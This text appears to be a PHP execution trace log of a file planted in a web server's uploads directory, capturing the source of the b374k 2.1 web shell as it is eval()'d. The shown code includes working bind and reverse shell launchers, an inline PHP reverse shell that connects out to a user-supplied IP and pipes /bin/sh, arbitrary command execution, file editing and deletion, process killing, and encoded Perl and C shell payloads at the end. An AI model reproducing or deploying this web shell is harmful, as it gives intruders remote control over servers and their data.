style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"odbcdsn\\" value=\\"".$odbcdsn."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"odbcuser\\" value=\\"".$odbcuser."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"odbcpass\\" value=\\"\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"odbccon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>connect using PDO</h2>\r\n <form action=\\"?db\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:120px;\\">DSN / Connection String</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"pdodsn\\" value=\\"".$pdodsn."\\" /></td></tr>\r\n <tr><td>Username</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"pdouser\\" value=\\"".$pdouser."\\" /></td></tr>\r\n <tr><td>Password</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"password\\" name=\\"pdopass\\" value=\\"\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"pdocon\\" class=\\"inputzbut\\" value=\\"Connect !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; } } } elseif(isset($_REQUEST[\'rs\'])){ $rshost = $s_server_ip; $rstarget = ""; $d = $pwd; if(isset($_REQUEST[\'d\'])) $d = ss($_REQUEST[\'d\']); $rsport = "13123"; $rspesan = "Press ' Go ! ' button and run ' nc <i>server_ip</i> <i>port</i> ' on your computer"; $rspesanb = "Run ' nc -l -v -p <i>port</i> ' on your computer and press ' Go ! ' button"; $rsport1 = $rsport; $rsport2 = $rsport; $rsport3 = $rsport; if(isset($_REQUEST[\'xbind_pl\'])){ if(isset($_REQUEST[\'sqlport1\'])) $rsport1 = ss($_REQUEST[\'sqlport1\']); $rstarget = $rsport1; $rsres = rs($s_win, cp($d), "xbind_pl" ,$xbind_pl, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xbind_py\'])){ if(isset($_REQUEST[\'sqlport2\'])) $rsport2 = ss($_REQUEST[\'sqlport2\']); $rstarget = $rsport2; $rsres = rs($s_win, cp($d), "xbind_py" ,$xmulti_py, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xbind_bin\'])){ if(isset($_REQUEST[\'sqlport3\'])) $rsport3 = ss($_REQUEST[\'sqlport3\']); $rstarget = $rsport3; if(!$s_win) $rsres = rs($s_win, cp($d), "xbind_bin" ,$xbind_c, $rstarget); else $rsres = rs($s_win, cp($d), "xbind_bin" ,$wmulti_c, $rstarget); $s_result .= $rsres; } $rsportb1 = $rsport; $rsportb2 = $rsport; $rsportb3 = $rsport; $rsportb4 = $rsport; $rstarget1 = $s_my_ip; $rstarget2 = $s_my_ip; $rstarget3 = $s_my_ip; $rstarget4 = $s_my_ip; if(isset($_REQUEST[\'xback_pl\'])){ if(isset($_REQUEST[\'sqlportb1\'])) $rsportb1 = ss($_REQUEST[\'sqlportb1\']); if(isset($_REQUEST[\'rstarget1\'])) $rstarget1 = ss($_REQUEST[\'rstarget1\']); $rstarget = $rsportb1." ".$rstarget1; $rsres = rs($s_win, cp($d), "xback_pl" ,$xback_pl, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_py\'])){ if(isset($_REQUEST[\'sqlportb2\'])) $rsportb2 = ss($_REQUEST[\'sqlportb2\']); if(isset($_REQUEST[\'rstarget2\'])) $rstarget2 = ss($_REQUEST[\'rstarget2\']); $rstarget = $rsportb2." ".$rstarget2; $rsres = rs($s_win, cp($d), "xback_py" ,$xmulti_py, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_bin\'])){ if(isset($_REQUEST[\'sqlportb3\'])) $rsportb3 = ss($_REQUEST[\'sqlportb3\']); if(isset($_REQUEST[\'rstarget3\'])) $rstarget3 = ss($_REQUEST[\'rstarget3\']); $rstarget = $rsportb3." ".$rstarget3; if(!$s_win) $rsres = rs($s_win, cp($d), "xback_bin" ,$xback_c, $rstarget); else $rsres = rs($s_win, cp($d), "xback_bin" ,$wmulti_c, $rstarget); $s_result .= $rsres; } if(isset($_REQUEST[\'xback_php\'])){ if(isset($_REQUEST[\'sqlportb4\'])) $rsportb4 = ss($_REQUEST[\'sqlportb4\']); if(isset($_REQUEST[\'rstarget4\'])) $rstarget4 = ss($_REQUEST[\'rstarget4\']); $ip = $rstarget4; $port = $rsportb4; $chunk_size = 1337; $write_a = null; $error_a = null; $shell = \'/bin/sh\'; $daemon = 0; $debug = 0; if(function_exists(\'pcntl_fork\')){ $pid = pcntl_fork(); if ($pid == -1) exit(1); if ($pid) exit(0); if (posix_setsid() == -1) exit(1); $daemon = 1; } umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){ if(feof($sock)) break; if(feof($pipes[1])) break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){ $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if(in_array($pipes[1], $read_a)){ $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if(in_array($pipes[2], $read_a)){ $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]); proc_close($process); $rsres = " "; $s_result .= $rsres; } $s_result .= "<div class=\\"mybox\\"><h2>Bind shell ( perl )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Server IP</td><td><input disabled=\\"disabled\\" style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rshost1\\" value=\\"".$rshost."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport1\\" value=\\"".$rsport1."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xbind_pl\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesan."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Bind shell ( python )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Server IP</td><td><input disabled=\\"disabled\\" style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rshost\\" value=\\"".$rshost."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport2\\" value=\\"".$rsport2."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xbind_py\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesan."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Bind shell ( bin )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Server IP</td><td><input disabled=\\"disabled\\" style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rshost\\" value=\\"".$rshost."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlport3\\" value=\\"".$rsport3."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xbind_bin\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesan."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Reverse shell ( perl )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Your IP</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rstarget1\\" value=\\"".$rstarget1."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlportb1\\" value=\\"".$rsportb1."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xback_pl\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesanb."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Reverse shell ( python )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Your IP</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rstarget2\\" value=\\"".$rstarget2."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlportb2\\" value=\\"".$rsportb2."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xback_py\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesanb."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Reverse shell ( bin )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Your IP</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rstarget3\\" value=\\"".$rstarget3."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlportb3\\" value=\\"".$rsportb3."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xback_bin\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesanb."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; $s_result .= "<div class=\\"mybox\\"><h2>Reverse shell ( php )</h2>\r\n <form action=\\"?rs\\" method=\\"post\\" />\r\n <table class=\\"myboxtbl\\">\r\n <tr><td style=\\"width:100px;\\">Your IP</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"rstarget4\\" value=\\"".$rstarget4."\\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\\"width:100%;\\" class=\\"inputz\\" type=\\"text\\" name=\\"sqlportb4\\" value=\\"".$rsportb4."\\" /></td></tr>\r\n </table>\r\n <input type=\\"submit\\" name=\\"xback_php\\" class=\\"inputzbut\\" value=\\"Go !\\" style=\\"width:120px;height:30px;margin:10px 2px 0 2px;\\" />\r\n <span id=\\"rs1\\">".$rspesanb."</span>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n </div>"; } elseif(isset($_REQUEST[\'view\'])){ $f = ss($_REQUEST[\'view\']); if(isset($fnew) && (trim($fnew)!="")) $f = $fnew; if(is_file($f)){ if(!$s_win && $s_posix){ $name=posix_getpwuid(fileowner($f)); $group=posix_getgrgid(filegroup($f)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $s_user; } $filn = basename($f); $s_result .= "<table class=\\"viewfile\\">\r\n <tr><td>Filename</td><td><span id=\\"".cs($filn)."_link\\">".$f."</span>\r\n <form action=\\"?d=".$pwd."&view=".$f."\\" method=\\"post\\" id=\\"".cs($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" />\r\n <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\"\r\n onclick=\\"tukar(\'".cs($filn)."_link\',\'".cs($filn)."_form\');\\" />\r\n </form>\r\n </td></tr>\r\n <tr><td>Size</td><td>".gs($f)."</td></tr>\r\n <tr><td>Permission</td><td>".gp($f)."</td></tr>\r\n <tr><td>Owner</td><td>".$owner."</td></tr>\r\n <tr><td>Create time</td><td>".date("d-M-Y H:i",filectime($f))."</td></tr>\r\n <tr><td>Last modified</td><td>".date("d-M-Y H:i",filemtime($f))."</td></tr>\r\n <tr><td>Last accessed</td><td>".date("d-M-Y H:i",fileatime($f))."</td></tr>\r\n <tr><td>Actions</td><td>\r\n <a href=\\"?d=".$pwd."&edit=".$f."\\">edit</a> |\r\n <a href=\\"javascript:tukar(\'".cs($filn)."_link\',\'".cs($filn)."_form\');\\">rename</a> |\r\n <a href=\\"?d=".$pwd."&delete=".$f."\\">delete</a> |\r\n <a href=\\"?d=".$pwd."&dl=".$f."\\">download</a> (<a href=\\"?d=".$pwd."&dlgzip=$f\\">gzip</a>)</td></tr>\r\n <tr><td>View</td><td>\r\n <a href=\\"?d=".$pwd."&view=".$f."&type=text\\">text</a> |\r\n <a href=\\"?d=".$pwd."&view=".$f."&type=code\\">code</a> |\r\n <a href=\\"?d=".$pwd."&view=".$f."&type=image\\">image</a></td></tr>\r\n </table>\r\n "; $t = ""; $iinfo = getimagesize($f); if(substr($filn,-3,3) == "php") $t = "code"; if(is_array($iinfo)) $t = \'image\'; if(isset($_REQUEST[\'type\'])) $t = ss($_REQUEST[\'type\']); if($t=="image"){ $width = (int) $iinfo[0]; $height = (int) $iinfo[1]; $imginfo = "Image type = ( ".$iinfo[\'mime\']." )<br />\r\n Image Size = <span class=\\"gaul\\">( </span>".$width." x ".$height."<span class=\\"gaul\\"> )</span><br />"; if($width > 800){ $width = 800; $imglink = "<p><a href=\\"?d=".$pwd."&img=".$filn."\\" target=\\"_blank\\">\r\n <span class=\\"gaul\\">[ </span>view full size<span class=\\"gaul\\"> ]</span></a></p>"; } else $imglink = ""; $s_result .= "<div class=\\"viewfilecontent\\" style=\\"text-align:center;\\">".$imglink."\r\n <img width=\\"".$width."\\" src=\\"?d=".$pwd."&img=".$filn."\\" alt=\\"\\" style=\\"margin:8px auto;padding:0;border:0;\\" /></div>"; } elseif($t=="code"){ $s_result .= "<div class=\\"viewfilecontent\\">"; $file = wordwrap(file_get_contents($f),"240","\\n"); $buff = highlight_string($file,true); $old = array("0000BB","000000","FF8000","DD0000", "007700"); $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000"); $buff = str_replace($old,$new, $buff); $s_result .= $buff; $s_result .= "</div>"; } else { $s_result .= "<div class=\\"viewfilecontent\\">"; $s_result .= nl2br(htmlentities((file_get_contents($f)))); $s_result .= "</div>"; } } elseif(is_dir($f)){ chdir($f); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } } elseif(isset($_REQUEST[\'edit\'])){ $f = ss($_REQUEST[\'edit\']); $fc = ""; $fcs = ""; if(is_file($f)) $fc = file_get_contents($f); if(isset($_REQUEST[\'fcsubmit\'])){ $fc = ssc($_REQUEST[\'fc\']); if($filez = fopen($f,"w")){ $time = date("d-M-Y H:i",time()); if(fwrite($filez,$fc)) $fcs = "file saved <span class=\\"gaya\\">@</span> ".$time; else $fcs = "failed to save"; fclose($filez); } else $fcs = "permission denied"; } $s_result .= " <form action=\\"?\\" method=\\"post\\">\r\n <textarea id=\\"fc\\" name=\\"fc\\" class=\\"evalcode\\">".htmlspecialchars($fc)."</textarea>\r\n <p><input type=\\"text\\" class=\\"inputz\\" style=\\"width:98%;\\" name=\\"edit\\" value=\\"".$f."\\" /></p>\r\n <p><input type=\\"submit\\" name=\\"fcsubmit\\" class=\\"inputzbut\\" value=\\"Save !\\" style=\\"width:120px;height:30px;\\" />\r\n ".$fcs."</p>\r\n <input type=\\"hidden\\" name=\\"d\\" value=\\"".$pwd."\\" />\r\n </form>\r\n "; } elseif(isset($_REQUEST[\'ps\'])){ $s_result = "<table class=\\"explore sortable\\">"; if(!$s_win) $h = "ps -aux"; else $h = "tasklist /V /FO csv"; $wcount = 11; $wexplode = " "; if($s_win) $wexplode = "\\",\\""; $res = exe($h); if(trim($res)==\'\') $s_result .= "<p class=\\"rs_result\\">error: permission denied</p>"; else{ if(!$s_win) $res = preg_replace(\'#\\ +#\',\' \',$res); $psarr = explode("\\n",$res); $fi = true; $tblcount = 0; $check = explode($wexplode,$psarr[0]); $wcount = count($check); foreach($psarr as $psa){ if(trim($psa)!=\'\'){ if($fi){ $fi = false; $psln = explode($wexplode,$psa,$wcount); $s_result .= "<tr><th>action</th>"; foreach($psln as $p){ $s_result .= "<th>".trim(trim(strtolower($p)),"\\"")."</th>"; } $s_result .= "</tr>"; } else{ $psln = explode($wexplode,$psa,$wcount); $s_result .= "<tr>"; $tblcount = 0; foreach($psln as $p){ if(trim($p)=="") $p = " "; if($tblcount == 0){ $s_result .= "<td style=\\"text-align:center;\\"><a href=\\"?ps&d=".$pwd."&pid=".trim(trim($psln[1]),"\\"")."\\">kill</a></td>\r\n <td style=\\"text-align:center;\\">".trim(trim($p),"\\"")."</td>"; $tblcount++; } else{ $tblcount++; if($tblcount == count($psln)) $s_result .= "<td style=\\"text-align:left;\\">".trim(trim($p), "\\"")."</td>"; else $s_result .= "<td style=\\"text-align:center;\\">".trim(trim($p), "\\"")."</td>"; } } $s_result .= "</tr>"; } } } $s_result .= "</table>"; } } else{ if(isset($_REQUEST[\'cmd\'])){ $cmd = ss($_REQUEST[\'cmd\']); if(strlen($cmd) > 0){ if(preg_match(\'#^cd(\\ )+(.*)$#\',$cmd,$r)){ $nd = trim($r[2]); if(is_dir($nd)){ chdir($nd); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } elseif(is_dir($pwd.$nd)){ chdir($pwd.$nd); $pwd = cp(getcwd()); $s_result .= showdir($pwd,$s_prompt,$s_win); } else $s_result .= "<pre>".$nd." is not a directory"."</pre>"; } else{ $s_r = htmlspecialchars(exe($cmd)); if($s_r != \'\') $s_result .= "<pre>".$s_r."</pre>"; else $s_result .= showdir($pwd,$s_prompt,$s_win); } } else $s_result .= showdir($pwd,$s_prompt,$s_win); } else $s_result .= showdir($pwd,$s_prompt,$s_win); } $s_info = "<table class=\\"headtbl\\"><tr><td>".$s_software."</td></tr>"; $s_info .= "<tr><td>".$s_system."</td></tr>"; if($s_id != "") $s_info .= "<tr><td>".$s_id."</td></tr>"; $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class=\\"gaya\\"> | </span>your ip : ".$s_my_ip."<span class=\\"gaya\\"> | </span>"; if($s_safemode) $s_info .= "safemode <span class=\\"gaya\\">ON</span>"; else $s_info .= "safemode <span class=\\"gaya\\">OFF</span>"; $s_info .= "\r\n </td></tr>\r\n <tr><td style=\\"text-align:left;\\">\r\n <table class=\\"headtbls\\"><tr>\r\n <td>".trim($letters)."</td>\r\n <td>\r\n <span id=\\"chpwd\\"> <a href=\\"javascript:tukar(\'chpwd\',\'chpwdform\');\\">> </a>".swd($pwd)."</span>\r\n <form action=\\"?\\" method=\\"get\\" style=\\"margin:0;padding:0;\\">\r\n <span class=\\"sembunyi\\" id=\\"chpwdform\\">\r\n <a href=\\"javascript:tukar(\'chpwdform\',\'chpwd\');\\">></a> \r\n <input type=\\"hidden\\" name=\\"d\\" class=\\"inputz\\" style=\\"width:300px;\\" value=\\"".cp($pwd)."\\" />\r\n <input type=\\"text\\" name=\\"view\\" class=\\"inputz\\" style=\\"width:300px;\\" value=\\"".$pwd."\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"submit\\" value=\\"view\\" />\r\n <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'chpwdform\',\'chpwd\');\\" />\r\n </form>\r\n </span>\r\n </td></tr>\r\n </table>\r\n </td></tr>\r\n </table>"; } ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\r\n "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\r\n \r\n <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\r\n \r\n <head>\r\n <title><?php echo $s_title; ?></title>\r\n <link rel="SHORTCUT ICON" href="<?php echo $_SERVER[\'SCRIPT_NAME\']."?favicon"; ?>" />\r\n \r\n <style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>\r\n \r\n <script type="text/javascript" src="<?php echo $_SERVER[\'SCRIPT_NAME\']."?sorttable"; ?>"></script>\r\n <script type="text/javascript">\r\n function tukar(l,b){\r\n if(document.getElementById(l)) document.getElementById(l).style.display = \'none\';\r\n if(document.getElementById(b)) document.getElementById(b).style.display = \'block\';\r\n }\r\n function init(){\r\n <?php if(isset($_REQUEST[\'cmd\'])) echo "if(document.getElementById(\'cmd\')) document.getElementById(\'cmd\').focus();"; ?>\r\n }\r\n </script>\r\n \r\n </head>\r\n \r\n <body onLoad="init();">\r\n <table id="main"><tr><td><?php if($s_auth){ ?>\r\n <div><table id="header"><tr><td><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>\r\n <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>\r\n </div>\r\n <div style="clear:both;"></div>\r\n <div id="menu">\r\n <table style="width:100%;"><tr>\r\n <td><a href="?&d=<?php echo $pwd; ?>" title="Explorer"><div class="menumi">xpl</div></a></td>\r\n <td><a href="?ps&d=<?php echo $pwd; ?>" title="Display process status"><div class="menumi">ps</div></a></td>\r\n <td><a href="?eval&d=<?php echo $pwd; ?>" title="PHP eval function"><div class="menumi">eval</div></a></td>\r\n <td><a href="?phpinfo&d=<?php echo $pwd; ?>" title="Information about current state of PHP"><div class="menumi">php</div></a></td>\r\n <td><a href="?db&d=<?php echo $pwd; ?>" title="Connect to database"><div class="menumi">db</div></a></td>\r\n <td><a href="?rs&d=<?php echo $pwd; ?>" title="Remote Shell"><div class="menumi">rs</div></a></td>\r\n <td style="width:100%;padding:0 0 0 6px;">\r\n <form action="?" method="get"><span class="prompt"><?php echo $s_prompt; ?></span>\r\n <input id="cmd" class="inputz" type="text" name="cmd" style="width:70%;" value="" />\r\n <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>\r\n <input type="hidden" name="d" value="<?php echo $pwd; ?>" />\r\n </form>\r\n </td>\r\n </tr>\r\n </table>\r\n </div>\r\n <div id="content" id="box_shell">\r\n <div id="result"><?php echo $s_result; ?></div>\r\n </div><?php } else{ ?>\r\n <div style="width:100%;text-align:center;">\r\n \r\n <form action="?" method="post">\r\n <img src="?favicon" style="margin:2px;vertical-align:middle;" />\r\n <?php echo $s_name; ?> <span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />\r\n <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />\r\n </form>\r\n </div>\r\n \r\n <?php\r\n } ?>\r\n </td></tr></table>\r\n <p class="footer">Jayalah Indonesiaku ©<?php echo date("Y",time())." ".$s_name; ?></p>\r\n </body>\r\n </html>\r\n ' /var/www/html/uploads/bbbbb.php 12 0
3 7 0 0.005195 893064 error_reporting 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 1 0
3 7 1 0.005213 893104
3 7 R 22527
3 8 0 0.005227 893064 set_time_limit 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 1 0
3 8 1 0.005245 893128
3 8 R FALSE
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $s_name = 'b374k'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $s_ver = '2.1'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $s_title = 'b374k 2.1'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $s_auth = FALSE
3 9 0 0.005305 893136 trim 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 1 '2cf1656ed3df6864df08feaf603ebe13'
3 9 1 0.005320 893168
3 9 R '2cf1656ed3df6864df08feaf603ebe13'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $xback_pl = 'dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0='
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $xbind_pl = 'bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI='
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $xback_c = 'XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B'
